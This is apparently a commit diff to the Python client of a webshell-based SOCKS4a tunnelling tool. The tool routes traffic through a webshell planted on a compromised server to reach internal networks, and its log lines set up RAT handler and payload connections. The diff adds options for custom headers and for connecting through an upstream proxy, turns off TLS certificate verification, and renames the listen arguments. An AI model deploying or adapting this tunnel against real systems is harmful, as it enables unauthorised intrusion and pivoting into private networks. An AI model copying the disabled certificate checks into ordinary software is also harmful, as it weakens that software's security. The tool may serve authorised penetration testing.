@@ -37,6 +37,7 @@ def __init__(self):
37
37
"Accept-Language" : "zh-CN,zh;q=0.8" ,
38
38
'Accept-Encoding' : 'gzip' ,
39
39
}
40
+ self .proxy = None
40
41
self .CACHE_CONNS = {}
41
42
self .MIRROR_CHCHE_CONNS = {}
42
43
# {
@@ -65,8 +66,32 @@ def __init__(self):
65
66
self .die_client_address = []
66
67
self .mirror_die_client_address = []
67
68
self .session = requests .session ()
69
+ self .session .verify = False
68
70
threading .Thread .__init__ (self )
69
71
72
+ def custom_header (self , inputstr ):
73
+ try :
74
+ str_headers = inputstr .split ("," )
75
+ for str_header in str_headers :
76
+ header_type = str_header .split (":" )[0 ].strip ()
77
+ header_value = str_header .split (":" )[1 ].strip ()
78
+ self .headers [header_type ] = header_value
79
+ except Exception as E :
80
+ self .logger .exception (E )
81
+ return False
82
+ self .logger .info ("------------ Custom http request header ------------" )
83
+ self .logger .info (self .headers )
84
+ self .logger .info ("\n " )
85
+ return True
86
+
87
+ def custom_proxy (self , proxy ):
88
+ self .proxy = {'http' : proxy , 'https' : proxy }
89
+ self .session .proxies = self .proxy
90
+ self .logger .info ("------------ Custom http request proxy ------------" )
91
+ self .logger .info (self .proxy )
92
+ self .logger .info ("\n " )
93
+ return True
94
+
70
95
def _post_data (self , url , data = {}):
71
96
payload = {
72
97
"Remoteserver" : self .REMOTE_SERVER ,
@@ -99,7 +124,6 @@ def run(self):
99
124
while True :
100
125
self ._sync_data ()
101
126
102
-
103
127
def _sync_data (self ):
104
128
has_data = False
105
129
# 清除无效的client
@@ -286,13 +310,17 @@ def _sync_data(self):
286
310
287
311
def setc_webshell (self , WEBSHELL ):
288
312
try :
289
- r = requests .get (WEBSHELL , verify = False , timeout = 3 , headers = self .headers , )
313
+ r = requests .get (WEBSHELL , verify = False , timeout = 3 , headers = self .headers , proxies = self . proxy )
290
314
if b"UTF-8" in r .content :
291
315
self .WEBSHELL = WEBSHELL
292
316
return True
293
317
else :
294
318
return False
319
+ except requests .exceptions .ProxyError as proxyError :
320
+ self .logger .error ("Connet to proxy failed : {}" .format (self .proxy ))
321
+ return False
295
322
except Exception as E :
323
+ self .logger .exception (E )
296
324
return False
297
325
298
326
def setc_remoteserver (self , REMOTE_SERVER = None ):
@@ -497,7 +525,7 @@ def run(self):
497
525
self ._port ))
498
526
return False
499
527
500
- self .logger .info ("Socks4a ready to accept" )
528
+ self .logger .warning ("Socks4a ready to accept" )
501
529
while True :
502
530
try :
503
531
conn , addr = s .accept ()
@@ -550,22 +578,36 @@ def _process_request(self, data, client_conn, addr):
550
578
parser .add_argument ('-w' , '--webshell' , metavar = 'http://192.168.3.10:8080/proxy.jsp' ,
551
579
help = "webshell url" ,
552
580
required = True )
581
+
582
+ parser .add_argument ('--header' , metavar = 'Authorization: XXX,Cookie: XXX' ,
583
+ help = "custom http request header" ,
584
+ default = None )
585
+
586
+ parser .add_argument ('--proxy' , metavar = 'socks5://127.0.0.1:1080' ,
587
+ help = "Connect webshell through proxy" ,
588
+ default = None )
589
+
553
590
parser .add_argument ('-l' , '--locallistenaddress' , metavar = '127.0.0.1/0.0.0.0' ,
554
591
help = "local listen address for socks4" ,
555
- default = '127.0.0.1' ,
556
- required = True )
557
- parser .add_argument ('-p' , '--port' ,
558
- default = 60000 ,
592
+ default = '127.0.0.1' )
593
+ parser .add_argument ('-p' , '--locallistenport' ,
594
+ default = 10800 ,
559
595
metavar = 'N' ,
560
596
type = int ,
561
597
help = "local listen port for socks4" ,
562
598
)
563
599
564
- parser .add_argument ('-st' , '--sockettimeout' , default = 0.05 ,
600
+ parser .add_argument ('-st' , '--sockettimeout' , default = 0.2 ,
565
601
metavar = "N" ,
566
602
type = float ,
567
603
help = "socket timeout value" ,
568
604
)
605
+ parser .add_argument ('-ti' , '--targetipaddress' , metavar = '127.0.0.1' ,
606
+ help = "reverse proxy target ipaddress" ,
607
+ required = False )
608
+ parser .add_argument ('-tp' , '--targetport' , metavar = '60020' ,
609
+ help = "reverse proxy target port" ,
610
+ required = False )
569
611
parser .add_argument ('-c' , '--cleansockst' , default = False ,
570
612
nargs = '?' ,
571
613
metavar = "true" ,
@@ -578,16 +620,10 @@ def _process_request(self, data, client_conn, addr):
578
620
type = bool ,
579
621
help = "clean server exist socket(this will kill other client connect)" ,
580
622
)
581
- parser .add_argument ('-ti' , '--targetipaddress' , metavar = '127.0.0.1' ,
582
- help = "reverse proxy target ipaddress" ,
583
- required = False )
584
- parser .add_argument ('-tp' , '--targetport' , metavar = '60020' ,
585
- help = "reverse proxy target port" ,
586
- required = False )
587
623
args = parser .parse_args ()
588
624
WEBSHELL = args .webshell
589
625
LISTEN_ADDR = args .locallistenaddress
590
- LISTEN_PORT = args .port
626
+ LISTEN_PORT = args .locallistenport
591
627
592
628
CLEAN_SOCKET = args .cleansockst
593
629
if CLEAN_SOCKET is not False :
@@ -596,6 +632,18 @@ def _process_request(self, data, client_conn, addr):
596
632
CLEAN_SOCKET = False
597
633
598
634
globalClientCenter = ClientCenter ()
635
+ header = args .header
636
+ if header is not None :
637
+ flag = globalClientCenter .custom_header (header )
638
+ if flag is not True :
639
+ sys .exit (1 )
640
+
641
+
642
+ proxy = args .proxy
643
+ if proxy is not None :
644
+ flag = globalClientCenter .custom_proxy (proxy )
645
+ if flag is not True :
646
+ sys .exit (1 )
599
647
600
648
SINGLE_MODE = args .singlemode
601
649
if SINGLE_MODE is not False :
@@ -605,73 +653,80 @@ def _process_request(self, data, client_conn, addr):
605
653
else :
606
654
SINGLE_MODE = False
607
655
608
- globalClientCenter .logger .info ("Local listen checking ... " )
656
+ globalClientCenter .logger .info ("------------------- Local check ------------------- " )
609
657
flag = globalClientCenter .setc_localaddr (LISTEN_ADDR , LISTEN_PORT )
610
658
if flag :
611
- globalClientCenter .logger .info ("Local listen check pass" )
612
- globalClientCenter .logger .info ("Socks4a on {}:{}" .format (LISTEN_ADDR , LISTEN_PORT ))
659
+ globalClientCenter .logger .info ("Local listen check : pass" )
613
660
else :
614
661
globalClientCenter .logger .error (
615
662
"Local listen check failed, please check if {}:{} is available" .format (LISTEN_ADDR , LISTEN_PORT ))
616
663
globalClientCenter .logger .error (WEBSHELL )
617
- globalClientCenter .logger .info ("WEBSHELL checking ..." )
664
+ sys .exit (1 )
665
+
618
666
webshell_alive = globalClientCenter .setc_webshell (WEBSHELL )
619
667
if webshell_alive :
620
- globalClientCenter .logger .info ("WEBSHELL check pass" )
668
+ globalClientCenter .logger .info ("WEBSHELL check : pass" )
621
669
globalClientCenter .logger .info ("WEBSHELL: {}" .format (WEBSHELL ))
622
670
else :
623
671
globalClientCenter .logger .error ("WEBSHELL check failed!" )
624
672
globalClientCenter .logger .error (WEBSHELL )
625
673
sys .exit (1 )
626
- globalClientCenter . logger . info ( "REMOTE_SERVER checking ..." )
674
+
627
675
result = globalClientCenter .setc_remoteserver ()
628
676
if result is None :
629
677
globalClientCenter .logger .error ("Read REMOTE_SERVER failed,please check whether server is running" )
630
678
sys .exit (1 )
631
679
else :
632
680
MIRROR_LISTEN = "127.0.0.1:60020"
633
- globalClientCenter .logger .info ("REMOTE_SERVER check pass" )
634
- globalClientCenter .logger .info ("------------------- Sever Config -------------------" )
681
+ globalClientCenter .logger .info ("REMOTE_SERVER check : pass" )
682
+ globalClientCenter .logger .info ("\n " )
683
+ globalClientCenter .logger .info ("------------------- Get Sever Config -------------------" )
635
684
for key in result :
636
685
globalClientCenter .logger .info ("{} : {}" .format (key , result .get (key )))
637
686
if key == "MIRROR_LISTEN" :
638
687
MIRROR_LISTEN = result .get (key )
688
+ globalClientCenter .logger .info ("\n " )
689
+
690
+ globalClientCenter .logger .info ("------------------- Set Sever Config -------------------" )
691
+ # 是否清理已有连接
639
692
if CLEAN_SOCKET :
640
693
flag = globalClientCenter .send_cmd ("CLEAN_SOCKET" )
641
694
globalClientCenter .logger .info ("CLEAN_SOCKET cmd : {}" .format (flag ))
642
695
696
+ # server建立内网tcp连接的超时时间,超时时间越长速度越慢
643
697
sockettimeout = args .sockettimeout
644
698
if sockettimeout != DEFAULT_SOCKET_TIMEOUT :
645
699
flag = globalClientCenter .sets_config ("SOCKET_TIMEOUT" , sockettimeout )
646
700
globalClientCenter .logger .info ("Set server SOCKET_TIMEOUT => {}" .format (flag ))
647
-
648
701
globalClientCenter .SOCKET_TIMEOUT = sockettimeout
702
+ globalClientCenter .logger .info ("\n " )
649
703
704
+ # 映射到本地的地址
650
705
TARGET_IP = args .targetipaddress
651
706
if TARGET_IP is None :
652
707
globalClientCenter .TARGET_IP = MIRROR_LISTEN .split (":" )[0 ]
653
708
else :
654
709
globalClientCenter .TARGET_IP = TARGET_IP
655
710
711
+ # 映射到本地的端口
656
712
TARGET_PORT = args .targetport
657
713
if TARGET_PORT is None :
658
714
globalClientCenter .TARGET_PORT = int (MIRROR_LISTEN .split (":" )[1 ])
659
715
else :
660
716
globalClientCenter .TARGET_PORT = int (TARGET_PORT )
661
- globalClientCenter .logger .info (
662
- "TARGET_ADDRESS : {}:{}" .format (globalClientCenter .TARGET_IP , globalClientCenter .TARGET_PORT ))
663
-
664
717
665
-
666
- globalClientCenter .logger .info ("------------------- RAT Config -------------------" )
718
+ globalClientCenter . logger . info ( "------------------! RAT Config !------------------" )
719
+ globalClientCenter .logger .info ("Socks4a on {}:{}" . format ( LISTEN_ADDR , LISTEN_PORT ) )
667
720
globalClientCenter .logger .info (
668
- "Handler/LISTEN should listen on {}:{}" .format (globalClientCenter .TARGET_IP , globalClientCenter .TARGET_PORT ))
721
+ "Handler/LISTENER should listen on {}:{}" .format (globalClientCenter .TARGET_IP , globalClientCenter .TARGET_PORT ))
669
722
globalClientCenter .logger .info (
670
723
"Payload should connect to {}" .format (MIRROR_LISTEN ))
724
+ globalClientCenter .logger .info ("------------------! RAT Config !------------------\n " )
725
+
671
726
# 启动服务
672
727
globalClientCenter .setDaemon (True )
673
728
674
- t2 = Socks4aProxy (host = args .locallistenaddress , port = args .port , timeout = sockettimeout , bufsize = BUFSIZE )
729
+ t2 = Socks4aProxy (host = args .locallistenaddress , port = args .locallistenport , timeout = sockettimeout , bufsize = BUFSIZE )
675
730
t2 .setDaemon (True )
676
731
677
732
globalClientCenter .start ()
0 commit comments